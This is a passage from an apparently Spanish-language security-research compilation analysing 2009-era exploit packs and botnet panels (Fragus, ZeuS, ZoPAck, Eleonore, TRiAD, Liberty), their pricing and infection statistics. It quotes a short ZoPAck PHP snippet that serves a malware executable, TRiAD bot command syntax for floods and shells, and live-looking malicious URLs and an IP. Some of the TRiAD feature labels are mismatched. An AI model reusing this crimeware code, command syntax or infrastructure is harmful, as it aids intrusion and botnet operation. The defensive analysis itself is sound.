Si observamos bien el gráfico, deducimos que las cinco vulnerabilidades que explotaron XP son:

• MS06-014 (MDAC_RDS). Crítica solucionada en abril de 2006. • MS06-071 (MSXML_setRequestHeader). Crítica solucionada en noviembre de 2006. • MS06-057 (WebViewFolderIcon). Crítica solucionada en octubre de 2006. • MS06-067 (DirectAnimation_KeyFrame). Crítica solucionada en noviembre de 2006. • MS06-055 (VML). Crítica solucionada en septiembre de 2006.

Todas vulnerabilidades consideradas críticas y solucionadas durante el año 2006 que explotaron, y seguramente seguirán explotando, equipos durante el 2008. Dos años después.

Realmente preocupante, ya que deja completamente al descubierto la falta de ¿responsabilidad? concientización y sensibilización frente al problema que ocasiona la falta de responsabilidad actualización, tanto a nivel cliente como a nivel servidor.

El informe también cubre la amenaza de los códigos maliciosos explicando que la solución antivirus de Microsoft, llamada MSRT (Malicious Software Removal Tool - Herramienta de eliminación de software malintencionado) eliminó más del 30% del malware mundial, donde la tasa de infección estuvo dominada por dos familias de malware que esta herramienta detecta como Win32/Zlob y Win32/Renos. En una mirada más cercana a Win32/AntivirusXP se explica la relación que existe entre Renos y AntivirusXP.

Otro dato más que interesante a tener en cuenta, es el relacionado a los países que tuvieron la mayor tasa de infección y cuál fue el malware que dominó esta tasa de infección. En este aspecto se desprende que los países son:

• Brasil: donde más del 60% de los equipos se encontraban comprometidos con algún tipo de código malicioso, predominantemente, troyanos del tipo banker. • China: donde predominaron las aplicaciones potencialmente indeseadas como el adware, sobre todo aquellos con capacidades de secuestrar el navegador (browser hijacking). • Italia: donde también predominó el adware infectando equipos a través de clientes para redes P2P y barras de tareas. • Corea: en este país, insisto, según Microsoft, la mayor tasa de infección fue provocada por virus como Virut y Patite a través de redes P2P. • España: donde los gusanos constituyeron la mayor amenaza con la tasa de infección más alta. • USA: donde abundaron los troyanos de la familia Zlob.

22

Con respecto a lo anteriormente mencionado, debo reconocer que me llama poderosamente la atención que Corea haya tenido una importante tasa de infección provocada por los clásicos virus, ya que este fue perdiendo terreno a lo largo del tiempo y en la actualidad representa un porcentaje mínimo del importante caudal de malware que se disemina a nivel mundial.

En lo que a diseminación de malware a través de correo electrónico se refiere, de este informe también resulta que el 97,8% de los archivos adjuntos bloqueados en servidor Exchange eran con extensión .html y .zip. Es decir, la mayor cantidad de códigos dañinos que se propagan a través del correo electrónico, poseen cualquiera de estas dos extensiones de archivo.

Por último, los ataques de phishing y el spam no se escaparon del reporte. Se desprende que:

• el 71,4% del spam, estuvo representado por la industria farmacéutica con productos como el viagra, el cialis y otros fármacos, • el 9.6% con cuestiones relacionadas al mercado de valores, • el 8.6% a material explícito, • y el porcentaje restante se repartió entre phishing (2.5%), casinos en línea (3.8%), venta de programas (1.1%), scam (1.1%) y algo que empezamos a ver desde principios del año 2008, los diplomas de altos estudios fraudulentos (1.9%).

De todas formas, los códigos maliciosos son y serán constituyendo una de las amenazas más importantes para la seguridad de los diferentes niveles de usuario y para las compañías, y en general todas las amenazas expuestas en este documento, por lo que seguramente, el siguiente informe desprenderá otro puñado de datos “jugosos”. 23

- Framework Exploit Pack para botnets de propósito general -

24

Fusión. Un concepto adoptado por el crimeware actual II Cada vez es más habitual que en los procesos de investigación nos encontremos con que en un mismo servidor se alojan, "operando" de forma activa, varios crimeware del tipo Exploit Pack desde los cuales controlan y administran los zombis que forman parte de su negocio fraudulento.

Hace un tiempo comentábamos sobre ZeuS y ElFiesta conviviendo en un mismo entorno, y cumpliendo los mismos objetivos.

En esta oportunidad, la fusión se encuentra entre Fragus (un crimeware cada vez más conocido) y ElFiesta. Ambos paquetes se encuentran alojados en el mismo servidor. Sin embargo, aunque cabe la posibilidad, esto no significa que estén siendo operados por el mismo botmaster.

El dominio en el cual se encuentran alojados es el siguiente:

En el caso de Fragus se encuentra en http://hotgirldream.net/far/ y en el caso de ElFiesta, se aloja en otra carpeta, la ruta es http://hotgirldream.net/content/. Como podemos apreciar, comparten el servidor, cuya dirección IP es 210.51.166.233, localizado en Yizhuang Idc Of China Netcom, Beijing.

Esto demuestra que las oportunidades de "negocio" no pasan solamente por la venta de crimeware, malware, exploit pack y demás actividades fraudulentas, sino que otra de las alternativas es ofrecer la infraestructura que permita, en función de su capacidad computacional, optimizar los procesos delictivos.

Una breve mirada al interior de Fragus Fragus es una de las aplicaciones web desarrolladas para la gestión de zombis, de origen ruso, que con poco tiempo de vida se ha insertado al mercado clandestino de crimeware con un precio accesible ( USD 800 ) si tenemos en cuenta las capacidades delictivas que ofrece.

Este crimeware se compone básicamente de cinco secciones: Statistics , Files , Sellers , Traffic links y Preferences . Cada una de ellas se encarga de una tarea específica y todas se complementan entre ellas.

En el panel Files se encuentra la manipulación del archivo ejecutable que será diseminado.

25

En Sellers encontramos la gestión de exploits . En este caso, correspondiente a la primera versión de Fragus.

26

En cuanto al módulo Traffic links , permite realizar la "previa" configurando el iframeado y el script que será inyectado en la página que oficiará de "conductor" para la ejecución de los exploits configurador en el panel previo, que buscaran vulnerabilidades en el equipo víctima.

Sin embargo, uno de los patrones que se identifican en cada uno de los paquetes de este estilo, es el módulo estadístico . Este módulo proporciona la información de inteligencia necesaria para que el botmaster obtenga un reporte detallado no solo de los equipos zombis sino también de ciertos aspectos necesarios para conocer en detalle qué exploit deberá ejecutar.

Otro de los patrones interesantes que podemos deducir en función de esta información es que el sistema operativo más explotado es Windows XP con Internet Explorer, que el exploit con mayor eficacia, a pesar de ser muy antiguo (MS06-014) es el que aprovecha la vulnerabilidad en MDAC y que entre los países con mayor tasa de infección son EEUU y Korea.

Este representa un escenario común donde quizás, el factor de relevancia, es la deducción de que tal vez lo común de la situación se debe al importante volumen de usuario que utiliza el sistema operativo de Microsoft de forma no licenciada, lo cual conlleva a no actualizarlo. 27

Por último, otro importante factor que no debe pasar desapercibido es que a los ciber- delincuentes no les interesa la controversia que existe en torno a los niveles de seguridad que ofrece uno u otro sistema operativo (Windows, GNU/Linux y Mac OS) sino que todos entran en la mismo categoría de "potenciales víctimas" porque la vulnerabilidad explota en capa 7.

Desarrollo de Botnets Open Source. “My last words”? Quienes leyeron el post sobre el proyecto crimeware denominado Quad System, recordarán que entre sus párrafos comentaba no conocer el costo de la versión privada de esta aplicación destinada al control de botnets , tanto para plataformas Windows como para plataformas GNU/Linux.

El tema es que… por cosas de la vida misma… el desarrollador de estos particulares proyectos diseñados en Perl, llamado cross , había terminado con sus hazañas censurándose a sí mismo con el cierre de su sitio web; manifestando, a través del mismo, las motivaciones que llevaron a su "violenta" decisión, y las cuales muestro en la siguiente captura:

Sin embargo, luego de varios días (de meditación quizás) , se decidió por volver a las andadas poniendo nuevamente a disposición con fine s educativos un arsenal de aplicativos destinados al control de botnets, o lo que es sinónimo en la actualidad, crimeware.

La nueva interfaz de su web es la siguiente:

Un dato curioso, que como el resto del post no guarda ninguna relación técnica con los aspectos de seguridad de la información, es la introducción al concepto de "Ironía" que plantea en el index ¿será que se siente irónico con sus propuestas colaborativas en el ámbito delictivo?

De todos modos, el chico aún parece enojado… ¿con los profesionales de seguridad? ... ya que con interfaz nueva escribe lo siguiente:

"…This site is dedicated to my projects and only my projects. Long time ago here you could find some more information, but currently, I don’t give a shit about providing any kind of information.

Besides, well, WTF? xD Something about me: I am the only one who is keeping this site somehow online and alive, taking care of it well, not much to take care of. What you can find here: some useless shit - my small projects. Well, I know no one gives a fuck, me neither - I placed them here and here they are to stay, you like it or not. So, no fun in here :D

Fuck… and who is that idiot founded this fucked up god forsaken piece of shit? xD LULZ and LOL xD As you can see I keep my head up and travel through life with a smile on my damn bitching face and ain't giving a fuck, man.

28

So you'll ask what a damn morron should be of me, starting with such introduction? Well, I'm the man, say, cross is in the house babe xD Anyways, just fuck it. You got here my projects; I will put some new here too. Like once in a year. Blah...Some new papers maybe if I will have some good mood for writing or i will be drunk as hell to believe in it. Hah...Whatevah..."

A pesar de todo esto, este "sutil" personaje, aparentemente empedernido programador en Perl, posee algunas cosas interesantes como una GUI para Nikto :-)

QuadNT System. Sistema de administración de zombis I (Windows) De la mano del mismo autor de los sistemas de control y administración de botnets Open Source ( cross ), hace un par de meses vio la luz otro de sus ambiciosos proyectos diseñados para controlar y administrar botnets llamado Quad .

En este caso, se trata de la versión desarrollada para plataformas Windows llamada QuadNT Remote Administrator , pero también existe una versión para sistemas operativos basados en plataformas *NIX. Al igual que con sus anteriores proyectos, este crimeware se caracteriza fundamentalmente por estar desarrollado en lenguaje Perl. Un aspecto para nada común en este tipo de aplicaciones.

A diferencia de las aplicaciones anteriormente presentadas por su desarrollador, QuadNT Remote Administrator no es gratuito; es decir, posee una versión libre con limitaciones importantes y una versión full privada. Sin embargo, lamentablemente no vamos a poder conocer, quizás por el momento, el costo real de este crimeware, por razones que dentro de poco les comentaré.

Entre sus funcionalidades se destacan la posibilidad de realizar:

• Connect Back Shell • Trash Flood • Mouse Logger • Keylogger • Proxy server • Encrypted Remote Terminal Emulator • Web HTTP Control Panel

Como lo comenta el mismo creador, este sistema de administración remota para el control de botnets se basa en tres aspectos fundamentales: 29

• Una Consola del lado del cliente • Un Gateway del lado del servidor • Automatización de la red cliente que es la botnet en sí misma

Esta primera versión de QuadNT centra sus esfuerzos trabajando en modo usuario ( Ring3 ). Sin embargo, cross, su autor, promete una segunda versión pero que trabaje a bajo nivel, exactamente a nivel del kernel o lo que es lo mismo, Ring0 .

Aunque los proyectos anteriores son gratuitos, y aunque esta misma versión se ofrezca también en versión libre pero con limitaciones, todavía no gozan de buena aceptación en el mundo clandestino que marca el negocio del crimeware.

Sin embargo, ello no significa que no constituyan amenazas, de hecho son potenciales alternativas que demuestran que el desarrollo de aplicaciones para manipular botnets puede ser abordadas en lenguajes de programación no tan comunes en el campo de las redes zombis.

ZoPAck. Nueva alternativa para la explotación de vulnerabilidades Indudablemente, la problemática generada por las botnets a nivel global constituye una de las tendencias que en ningún paper se debería obviar. En este sentido, el desarrollo de aplicaciones destinadas al control y administración de zombis vía web, cuyas primeras repercusiones vieron la luz a fines del 2006 alcanzando en la actualidad la popularidad en la comunidad underground y delictiva, no cesa.

Bajo una particular interfaz de autenticación, aparece ZoPAck , un crimeware cuya primera incursión fue en el 2007, desarrollado en PHP y destinado a explotar vulnerabilidades a través de una importante gama de exploits.

La actualización a esta nueva versión, la 1.02, se produjo durante este mismo año 2009. Y si bien no se ha masificado su eso y no cuenta con la popularidad de otros, es un paquete que no tiene nada que envidiar a sus competidores y cumple de igual manera con el objetivo para el cual fue diseñado: reclutar zombis aprovechando debilidades en los sistemas operativos y aplicaciones.

Por intermedio de un archivo .pdf, provoca un desbordamiento de búfer ( buffer overflows ) en las aplicaciones Adobe Acrobat y Reader (CVE-2007-5659 y CVE-2008-0655), reclutando la zombi a través de la descarga de su ejecutable ( file.exe ) llamado desde el archivo exe.php. A continuación vemos parte de su código. include "db.php"; include "mysql.php"; $db = new db; $ip = getenv("REMOTE_ADDR"); $db->query("UPDATE statistics SET is_dw=1 WHERE ip='".$ip."'"); 30

$filename = "./file.exe"; $size = filesize($filename); $fp = fopen($filename, "r"); $source = fread($fp, $size); fclose($fp);

La estructura de ZoPAck es muy sencilla al igual que su configuración permitiendo simplemente configurar a través de la interfaz los datos de autenticación y el dominio donde se alojará el crimeware para su acceso.

El módulo encargado de llevar los datos estadísticos, lo que a mí me gusta llamar el módulo de Inteligencia , le permite al botmaster recavar información relacionada a las características de cada computadora que forma parte de su red.

Esta característica podría tener dos lecturas. Por un lado, que el crimeware se encuentra diseñado con una notoria orientación a script kiddies o prospecto a delincuentes; por el otro, quizás el objetivo del autor ( ¿ZOPA? ) es proporcionar una aplicación lo más optimizada posible para hacer de la labor de los ciber-delincuentes lo menos rigurosa posible.

En fin, un nuevo crimeware que se une a la colección de alternativas disponible en el mercado clandestino.

ZeuS Botnet y su poder de reclutamiento zombi Como lo he comentado en varias oportunidades, ZeuS es una de las botnets más "mediáticas" (por ende una de las más conocidas y populares), más agresivas y la que posee mayor actividad delictiva con funciones avanzadas que permiten realizar ataques de phishing, monitorear las zombis en tiempo real y recolectar toda esa información a través de diferentes protocolos.

Estas actividades agresivas que fundamentalmente proponen metodologías para obtener información confidencial de las computadoras comprometidas por alguna de las variantes que forman parte de la familia ZeuS, cuentan actualmente con un amplio repertorio de páginas falsas de entidades bancarias y financieras destinadas exclusivamente a la recolección de información mediante phishing.

31

Asimismo, la posibilidad de contar con un módulo de monitoreo por el cual el botmaster puede estar visualizando en tiempo real absolutamente todo lo que se realiza en la PC zombi (navegación por servicios de webmail, transacciones bancarias, conversaciones por chat, etc.), supone un grave peligro que atenta directamente contra la confidencialidad .

Y aunque para muchos parezca una cuestión trivial, el solo hecho de saber que su desarrollador actualiza cada versión de ZeuS, desde el año 2007, aproximadamente una vez por mes, es un punto relevante que marca el por qué de su popularidad en el ambiente under.

Pero sin embargo, a pesar de todo esto, aún hoy parece que no se valoran en su justa medida las implicancias de seguridad que tienen implícitas las actividades, no sólo de ZeuS sino de cualquiera de las alternativas crimeware que día a día bombardean Internet con sus acciones delictivas.

Quizás, lo que a continuación les voy a mostrar sea un aspecto fundamental para comprender el verdadero alcance delictivo que tienen este tipo de actividades.

Se trata de una botnet ZeuS con un corto periodo de vida, pero con un importante volumen de zombis reclutados que se aglomeran en su cuartel bajo la tutela del "negociante" esperando sus órdenes.

La siguiente captura muestra los zombis reclutados sólo en Rusia, en este caso, por el botmaster que inició sesión bajo el nombre " russian ". Esta información se obtiene a través de la opción de filtrado, limitando la búsqueda con el acrónimo del país (RU).

Ahora… una de las preguntas que quizás muchas veces nos hacemos al hablar de botnets es ¿cuál es la capacidad de reclutamiento que poseen? y aunque la respuesta es relativa podríamos decir que no tiene límites, o que el límite estará dado en función de la capacidad de los servidores utilizados por los botmasters.

32

Pero, siguiendo el ejemplo anterior, podemos tener una idea lo suficientemente concreta sobre el poder de reclutamiento que posee, en este caso, el botmaster " russian ".

Con una actividad de tres (3) meses , cuenta con una cantidad de 24.830 zombis. Algo así como casi 276 infecciones de ZeuS por día . Y si seguimos la lógica, estadísticamente hablado, la cantidad se podría cuadruplicar a lo largo del año.

Por otro lado, la posibilidad de administrar una botnet vía web, supone también que pueden ser administradas varias al mismo tiempo; es decir, que varios botmasters pueden utilizar la misma aplicación web (en este caso ZeuS) para controlar "sus" zombis.

De esta manera, el usuario " russian " posee una actividad relevante. Pero también podemos obtener información de sus pares que se encuentran administrando zombis bajo el mismo dominio.

Por ejemplo, el usuario " system " posee 10.184 zombis pero reclutadas durante un periodo de 30 días . Aproximadamente 335 zombis por día . Todo, a través de una sola botnet ZeuS ¿ se imaginan cuantas ZeuS como estas se encuentran In-the-Wild?

33

Mientras que el botmaster con menos actividad cuenta con tan sólo 34 zombis , pero en menos de 1 hora .

En resumen, independientemente del tiempo de actividad de una u otra botnet, la tasa de reclutamiento es muy alta.

Esto significa también que los mecanismos de prevención no son lo suficientemente efectivos, y de hecho un reciente estudio deja en evidencia que los mecanismos evasivos que incorpora ZeuS son lo suficientemente efectivos frente a los mecanismos de detección de muchas de las soluciones antivirus actuales.

No obstante, bajo un aspecto más riguroso, que el malware actual incorpore mecanismos auto- defensivos cada vez más eficaces no significa que los antivirus no son efectivos. Además, no todo pasa por la solución de seguridad y gran parte de la responsabilidad recae en el usuario ya que, en definitiva y siguiendo con el aspecto riguroso, un sistema no se infecta por sí solo.

ZeuS, spam y certificados SSL Como ya sabemos, las actividades delictivas propuestas por la botnet ZeuS a través de su familia de troyanos y a lo largo de ya dos años de gozar con la categorización In-the-Wild, se impone frente a otras actividades crimeware con un importante volumen de variantes que aún hoy siguen reclutando zombis proponiendo, como parte de su estrategia de engaño, nuevas alternativas.

En esta oportunidad, y como en otras, una de sus variantes se está diseminando por correo electrónico mostrando un mensaje que alude a la actualización manual del certificado SSL. El mensaje dice así:

"On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour. The changes will concern security, reliability and performance of mail service and the system as a whole.

For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure. This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That's all.

[Enlace malicioso]

Thank you in advance for your attention to this matter and sorry for possible inconveniences.

System Administrator "

34

Como es habitual en ZeuS , el ejemplar analizado presenta un patrón característico en la actualidad del malware, que se centra en la fusión de actividades propias de diferentes códigos maliciosos.

En este caso, posee un componente keylogger encargado de recolectar la información privada de los usuarios (nombres de usuarios, contraseñas, números de tarjetas de crédito, credenciales de acceso al Home-Banking) que utilizan la computadora comprometida. También establece una conexión con http://hostz-150909.com/zed1/table.bin para descargar su archivo de configuración.

Por otro lado, implanta en la zombi un backdoor a través del cual el atacante accede al sistema víctima sin demasiados inconvenientes; además de ejecutar actividades rootkit escondiendo los archivos maliciosos en una carpeta llamada " lowsec " (también oculta) que se crea en la carpeta de sistema. Los archivos son los siguientes:

• %System%\lowsec\local.ds • %System%\lowsec\user.ds • %System%\lowsec\user.ds.lll

Todo controlado por el habitual archivo "sdra64.exe" característico de ZeuS que también crea en la carpeta de sistema; y a través de un módulo de auto-defensa intenta terminar los procesos del programa antivirus y del firewall.

Por suerte esta variante de ZeuS posee un índice de detección alto; sin embargo, estas acciones maliciosas son comunes de toda la familia de esta amenaza.

Según TrendMicro, esta nueva maniobra de ZeuS a través del correo estaría dirigida a los empleados de determinadas compañías; y a juzgar por la firma del mensaje (System Administrator) y que alude a una actualización manual del certificado SSL, el círculo de Ingeniería Social parece cerrarse.

Sin embargo, lo preocupante de todo esto, independientemente de sus maniobras y métodos de propagación, es la constancia que ZeuS sigue manteniendo a lo largo del tiempo desde la liberación de su código en el 2007 y de las distintas versiones, aunque antiguas, que pueden ser conseguidas sin demasiados esfuerzos.

35

Nueva versión de Eleonore Exploits Pack In-the-Wild Como es habitual, el crimeware sigue un ciclo de desarrollo que no pierde el eje gestado en las mentes de los ciberdelincuentes que se encuentran detrás de su comercialización: el dinero.

Este ciclo depende directamente de quien desarrolle el crimeware; por ejemplo, en el caso de ZeuS, el ciclo ronda los 30 días. Es decir, aproximadamente, cada mes aparece una nueva versión de ZeuS, y así con cualquiera de las otras alternativas.

En este caso, se trata de una nueva versión, la 1.3B , de Eleonore Exploits Pack , este paquete diseñado para administrar y controlar zombis de una botnet que sigue un ciclo de desarrollo similar al mencionado anteriormente al referirme a ZeuS, uno de sus colegas.

Todavía no se ha puesto a la venta de forma directa esta versión de Eleonore Exp, sino que se encuentra disponible de manera exclusiva y, por el momento, solo existen algunas versiones de test con las cuales se está experimentando su funcionamiento.

En otras palabras, esta nueva versión no se encuentra en el ambiente clandestino especializado y es adquirida sólo a través de su programador.

Por el momento no he podido abordar con mayor profundidad este ejemplar, sin embargo, estimo que quizás el cambio más relevante radica en torno a la disponibilidad de nuevos exploits, optimización de la conectividad y mejoras en el proceso de inteligencia destinado a la obtención de datos estadísticos relacionados a las zombis (países, navegadote, OS, entre otros).

Aún así, esto refleja el “entusiasmo” con el cual los caber-delincuentes trabajan para “optimizar” (mejoras diría su creador, quien se hace llamar Exmanoize) el abanico de funcionalidades maliciosas incorporadas en cada variante.

36

Hybrid Botnet Control System. Desarrollo de http bot en perl El desarrollo de crimeware es cada vez más abierto. Sus creadores buscan constantemente implementar en los programas dañinos mecanismos evasivos cada vez mas eficaces con un mínimo impacto de recursos no solo en el equipo controlado arbitrariamente sino también en los servidores que los alojan, existiendo en la actualidad una gama de alternativas realmente importante que van desde "productos" pagos a gratuitos.

En este sentido, en algún momento había mencionado el desarrollo Open Source de crimeware donde conté sobre la creación de dos proyectos paralelos; y si bien no se tratan de aplicaciones complejas presentan dos características llamativas.

Por un lado, su descarga es libre, lo cual significa que el concepto adoptado en la aplicación puede ser ampliado (o “mejorado” diría su autor) por otros desarrolladores agregando funcionalidades mucho más complejas.

Por otro lado, no entra (en primera instancia) en el ciclo del mercado clandestino de comercialización de crimeware.

En el caso particular de Hybrid Botnet Control System y a diferencia de los aplicativos web de este estilo, el bot se encuentra escrito en Perl, algo no habitual (de hecho creo que si no es el primero es uno de ellos).

Por lo demás, es básicamente similar a cualquiera de las alternativas disponibles en el mercado negro. 37

Es decir, el panel de administración es vía web, escrito en PHP y la base de datos se almacena en un MySQL.

Otro aspecto común es que generalmente el desarrollo y comercialización de los aplicativos diseñados para el control y administración ( C&C) de botnets posee su cuna en países como Rusia, y si bien el panel de control vía web de Hybrid se encuentra basado en uno de los primeros aplicativos de origen ruso que implantaron el concepto de administración vía http llamado Black Energy (a quien pertenece la captura que muestra el sistema de autenticación), parecería que su base de desarrollo no se encuentra en Europa del Este.

De todos modos, sea cual fuese el origen de su desarrollo, estas actividades no hacen otra cosa que ayudar a incrementar los ingresos de ciber-delincuentes y alimentar el ciclo delictivo muy arraigado bajo el concepto de crimeware, marcando una tendencia difícil de frenar debido al abanico de alternativas que pueden ser implementadas e implantadas a través de este tipo de iniciativas.

Desarrollo de crimeware Open Source para controlar y administrar botnets El desarrollo de aplicativos web orientados al control y administración de botnets a través del protocolo http, se encuentra en un nivel muy avanzado por parte de la comunidad underground de Europa del Este, y en particular desde Rusia, donde ciber-delincuentes inundan constantemente el mercado clandestino de crimeware comercializando paquetes como Eleonore, ZeuS, ElFiesta, Adrenaline, entre muchos otros.

Sin embargo, este modelo de negocio que ya se encuentra implantado, se expande hacia otros territorios donde la ambición de ciber-delincuentes se ve espejada por esta tendencia difícil de frenar, pero con otras filosofías: Crimeware Open Source . Es decir, desarrollo de programas de código abierto diseñados para ser utilizados con fines delictivos a través de Internet.

En este caso, se trata de una familia de crimeware diseñados para el control y administración de redes zombis.

Se trata de una serie de proyectos que buscan, como dice el autor (cuyo nick es “ cross ”), dejar claro que el desarrollo de botnets en Perl es posible. Bajo el slogan “ x1Machine Remote Administration System ” pone a disposición del ciber-crimen organizado dos proyectos orientados al manipuleo de botnets llamados Hybrid y TRiAD .

Hybrid Project El proyecto “Híbrido” es el más ambicioso. Se encuentra escrito en Perl, funciona sólo en plataformas GNU/Linux y permite, como es común en la mayoría del crimeware actual de este estilo, administrar botnets por http. Si bien su autor manifiesta que no fue concebido con fines maliciosos, la leyenda que se encuentra en la interfaz de la versión 1 (la imagen que a continuación se muestra) dice BotNet Control System , lo cual es contradictorio.

38

La configuración se realiza por intermedio de un pequeño panel al cual se accede a través del archivo HyGen.pl .

La versión 2 (siguiente captura) mantiene las mismas características que su antecesor. Por el momento, se encuentra en estado de “Prueba de concepto” (PoC). Sin embargo, puede ser manipulado por cualquier ciber-delincuente para hacerlo completamente funcional y agregar más componentes para abusar de los zombis.

Un detalle interesante es que su interfaz se encuentra basada en BlackEnergy , una de las primeras botnet basadas en administración vía http diseñada para realizar ataques DDoS (Denegación de Servicio Distribuida ).

TRiAD Project Sobre este crimeware ya hemos hablado. Se trata de un proyecto paralelo cuya primera versión (siguiente captura) está diseñada, al igual que el proyecto Hybrid , para operar bajo entornos GNU/Linux.

Esta primera versión nació a principios de 2009 y ya cuenta con tres versiones que incorporan algunas funcionalidades más. Se encuentra escrito en C y a través de ella se pueden llevar a cabo tres actividades dañinas: ejecución de ataques de Denegación de Servicio Distribuida (DDoS ), BindShell ( ejecución de una shell y apertura de puertos ) y ReverseShell ( aviso de conexión de una zombi ).

TRiAD HTTP Control System v2 es la segunda versión del proyecto que evolucionó para convertirse en un crimeware multiplataforma que puede ser implementado en sistemas Windows y GNU/Linux. 39

Esta versión, además de contar con las funcionalidades presentes en la versión 1, posee nuevas características: eliminación de la bot , apagar y reinicio del equipo de forma remota . La siguiente captura corresponde a la página de descarga.

Al igual que la segunda versión, TRiAD http Control System v3 se encuentra escrito en C, compilado con GCC y es corre bajo Windows y GNU/Linux. Sus características son:

En sistemas GNU/Linux:

• Syn Flood con source IP spoofing: [SynStorm]-[Host]-[Port]-[Nr of Packets]-[Delay] • Small HTTP Server: [HTTP Server]-[Port]-[Time(minutes)] • Bind Shell: [Bind Shell]-[Port]-[Allowed IP Address]

Mientras que la versión para plataformas Windows cuenta con:

• UDP Flood: [Reverse Shell]-[Host]-[Port] • Small Proxy Server: [UdpStorm]-[Target IP]-[Target Port]-[Nr of Packets]-[Delay] • Reverse Shell: [Proxy Server]-[Port]-[Time(minutes)]

Independientemente de la plataforma, ambas poseen en común la posibilidad de:

• Sleep: Modo “dormido” • Reboot remote machine: Reiniciar el equipo de forma remota • Shutdown remote machine: Apagar el equipo de forma remota • Delete bot from remote machine: Eliminar la bot de forma remota

Evidentemente, esta situación supone una serie de aspectos agravantes que hacen de este tipo de “iniciativas” fuentes ideales tanto para script kiddies aspirantes a ciber-delincuentes por su condición de gratuito, como para desarrolladores profesionales que pueden personalizar su código para agregar funcionalidades que se adapten a las necesidades de cada comprador (por lo general, botmasters) en función de la plataforma que se desea explotar.

40

Fragus. Nueva botnet framework In-the-Wild Una nueva aplicación web escrita en php y desarrollada como sistema de administración de exploits, diseminación de malware y control de botnets, ha entrado al mercado clandestino de crimeware prometiendo ser uno de los más explotados.

Se trata de Fragus v1.0 , que se ha sumado desde julio de 2009 a la gran lista de aplicativos de este estilo que pretenden acaparar el mercado negro. Su desarrollo esta originado en Rusia y se inserta al mercado con un costo suficientemente “competitivo”.

En los últimos meses han surgido nuevos framework para el control y administración de botnets que hacen de ello una tarea muy sencilla como Liberty Exploit System y Eleonora Exploit Pack ; entre algunos otros mucho más antiguos que han actualizado sus funcionalidades como YES Exploit System y ElFiesta .

Sin embargo, el hecho de encontrar cada vez más aplicativos maliciosos de este estilo In-the- Wild no es una situación casual, sino que responde a un modelo de negocio que se esconde detrás del desarrollo de crimeware y se retroalimenta a si mismo con la comercialización de un gran abanico de opciones.

Desde un punto de vista general, Fragus cuenta con una interfaz atractiva, soporte para idioma inglés y ruso, y un sencillo sistema de estadísticas que permite obtener y comparar información relacionada a los navegadores, sistemas operativos (incluyendo sus versiones) y países en los cuales se han reclutado los zombis que forman parte de la red (lo que es lo mismo: una estrategia de inteligencia que permite relacionar información de forma oportuna). La siguiente captura muestra el control estadístico.

41

Además posee otras características como:

• Posibilidad de chequear de forma rápida los datos a través de un resumen al cual se accede sin cargar la página. • Administrar el upload de archivos desde el mismo panel de administración. • Permite especificar un nombre al archivo binario que se subirá al sistema. • Posibilidad de distinguir el tráfico realizado por un “cliente” para mantener cada estadística de forma independiente. • Permite elegir el archivo a subir desde el panel de administración o realizar una carga de forma aleatoria. • Permite a sus “clientes” mantener su propio kit de exploits seleccionándolos desde una lista. • También permite controlar la información estadística desde un dominio independiente al del panel de administración, lo cual permite acceder a la información sin realizar el proceso de autenticación. • Permite limpiar la información estadística a nivel general o en particular de cada “cliente”. • Toda la configuración de las opciones que ofrece Fragus para la administración y control de botnets se pueden realizar fácilmente desde el Framework. • Posee un sistema de búsqueda interno que permite buscar y encontrar rápidamente enlaces con iframe en el tráfico abierto. También en general o en particular para cada “cliente”.

Además, Fragus también permite explotar vulnerabilidades en imágenes de alta calidad, editar la cantidad de dominios necesarios para realizar una migración de la información sin perder el tráfico, editar una dirección URL en la cual explotar paquetes de visitas dos veces o más; es decir, descargar desde la misma página varios binarios, pdf, swf dependiendo del exploit.

Ejemplos de malware diseminado por Fragus son:

• Manual.pdf • Patch.exe

Su sistema modular permite añadir exploits fácilmente y posee un cripter (optativo) escrito desde cero que, según el autor, evita la detección por parte de una gran cantidad de compañías antivirus sin sobrecargar el navegador. Pero no obstante, también permite seleccionar un cripter diferente dándole al “cliente” la posibilidad de decidir qué cripter utilizar sin limitarlo al incorporado por defecto. El autor también asegura que Fragus está optimizado para funcionar sin problemas con grandes flujos de tráfico y carga mínima en el servidor.

42

Otro aspecto que resalta, y que lo diferencia de los clásicos crimeware de su tipo es que posee una instrucción destinada a evitar la detección del dominio utilizado por parte de los searchbots, (el dominio asociado a Fragus por defecto cuando se lanzo el crimeware es fragus.cn ) y el proceso de instalación no es engorroso ni necesita tocar algún archivo de configuración de forma manual, ya que posee un asistente de ayuda que permite tenerlo instalado en pocos minutos.

Entre los exploits que posee preinstalados se encuentran:

• MDAC • PDF printf() • PDF collectEmailInfo() • PDF getIcon() • MS DirectShow • MS09-002 - for IE7 • MS Spreadsheet • AOL IWinAmp • MS Snapshot MS COM

El costo de esta primera version de Fragus es USD 800 . Este valor incluye el código fuente que se encuentra protegido con IonCube . El costo del cripter (escrito desde cero) es de USD 150 y por otros USD 30 se esconde el funcionamiento del crimeware para evadir su detección, quizás con técnicas fast-flux .

En definitiva, el “servicio” completo de Fragus posee un costo de USD 980 y, como es habitual en este mercado clandestino, el “trato” de compra se realiza a través de ICQ y la transacción del dinero a través de WebMoney.

Como podemos apreciar, este nuevo crimeware que se inserta en la escena delictiva promete ser muy competitivo. Además, el malware que tiene por defecto listo para su diseminación posee una tasa de detección preocupantemente baja, lo cual transforma a esta aplicación web en una seria amenaza.

Liberty Exploit System. Otra alternativa crimeware para el control de botnets El mercado negro controlado por ciber-delincuentes sigue generando productos “competitivos” dentro de un negocio donde el bajo costo del crimeware marca y justifica su uso masivo. En este sentido, las botnets se ven beneficiadas por el desarrollo de aplicativos web destinados a hacer de su administración, una tarea fácil e intuitiva; además de alimentar constantemente el proceso delictivo del cual forman parte.

Otra de las alternativas que se suma es este negocio clandestino es Liberty Exploit System , cuyo autor recientemente a puesto a disposición del ciber-crimen una nueva versión, la 1.0.5, y de la cual manifiesta que posee una excelente relación “precio/calidad”.

Su valor es de USD 500 . Por USD 20 más se consigue la “ventaja” de acceder a un cripter , y por otros USD 50 se ofrece el cambio de dominios cuando el utilizado ha sido bloqueado, lo que demuestra el tipo de servicios que ofrece el crimeware en general. 43

Además, el sistema de pago se realiza solamente a través de WebMoney.

